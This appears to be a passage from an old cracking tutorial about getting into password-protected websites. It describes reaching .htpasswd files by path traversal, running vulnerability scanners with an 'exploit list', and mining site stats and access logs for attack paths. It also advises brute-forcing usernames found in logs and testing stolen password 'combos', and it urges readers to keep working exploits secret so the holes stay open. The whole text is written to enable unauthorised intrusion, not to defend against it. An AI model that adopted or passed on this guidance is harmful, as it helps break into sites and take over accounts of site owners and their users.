--------------------------------------------------------------

Now, there is no way we can get to it since the web root puts us in home/users/www.site.com/hidden/www and we are well past the days when you could back up above a web root in an Apache web server.

If ../ worked, we would be in luck, since we could specify http://www.site.com/../hidden/.htpasswd. This used to work, or the unicoded version worked, or the double unicoded version worked, or quotes worked, or unicoded quotes, etc., etc. Not so anymore....

Our only hope, when the .htpasswd is not on the web root, is to find another exploit that will allow us to access files. Such things exist but are hard to find, so read on....

SO NOW WHAT?
Well, as you tried to get the passfile looking for it in the obvious locations, and failed...maybe there are other ways of obtaining it....

Using AD or another security scanner, you can start looking for so-called vulnerabilities. This means testing the website for security, and trying to find ways into the site. How does this work, you ask? We need a tool to test the security...

For these essays, I will be talking about a tool called WebSiteFinder, or WSF in short. Written by Wolfman, this is a great tool, in my opinion. AD or Passcraft can do the same, so use whatever you feel comfortable with. If you start out, use AD.

To make these tools really effective, you need an exploit list. This is a list of basic paths that will be tested for possible vulnerabilities or access against the website. AD offers a basic exploit list, at least the older versions did. Exploit lists can be found all over the web, but please realise these are very basic, and some of the holes (=vulnerabilities) they have in it, are old and will not work anymore on most sites.

HOW TO MAKE YOUR OWN EXPLOIT LIST
Really good exploiters or crackers will not share their lists with you. The reason: Once some exploits are made public, chances are the holes will be discovered quickly and thus closed! And that is a bummer.

So you have to build your own list. How, you ask? Here are a few tips.

1. ANALYZE, THINK, STUDY, BE CREATIVE
First place to start, is to analyze your current exploit list. What makes sense, and what does not. What paths do you understand? Why do you think that particular path is a vulnerability, and if you came accross it, how would you use it? If you don't know, ask on a forum via PM, there are many people around that can and will help you. Moreover, read up on security sites (better get used to it), such as packetstorm, securiteam, etc.

NOTE: It is no use to just try exploits on sites if you don't understand what you are doing. The results can be very bad. You could, unwillingly, do damage to the site!

2. KEEP YOUR EYES ON THE SCREEN
Look at directory trees of sites you visit. Try to go up and down in levels in the dir to possibly find more holes...copy these to your exploit list.

3. STATS and LOGS
These are KING in my book. Why? Stats show the requests made to a website, and some stats list all the requests....including those of someone trying to exploit the site. The paths that this person tried may not have worked on the site, but heh, copy them to your exploit list, they may come in handy for other sites! Access logs show the same thing...moreover, they might tell you alot about the server, home server (FTP logs), usernames, and the basic website structure.

INTERMEZZO: "What to do with the usernames?"
This is a question I get a lot. Someone has seen the stats, and now has a list of usernames. Now what? Well, half the battle is won! Remember the statement I made about increasing your chances in getting access? This is it! Proceed in two ways:
1. Use the usernames and one of your wordlists to do a BF attack
2. Match the usernames to working combos you have. There are tools for this, and try to see if the combos work. Many users use the same password for different sites...see where I am getting at?

4. GOOGLE, GOOGLE, GOOGLE!
I love google. I embrace googling. You should too. Make googling your hobby! Type in a path or exploit, and see what you get, you will be surprised! It will lead you to access logs, vulnerability reports, cool sites, etc. Whatever you find and think is useful, copy to your exploit list...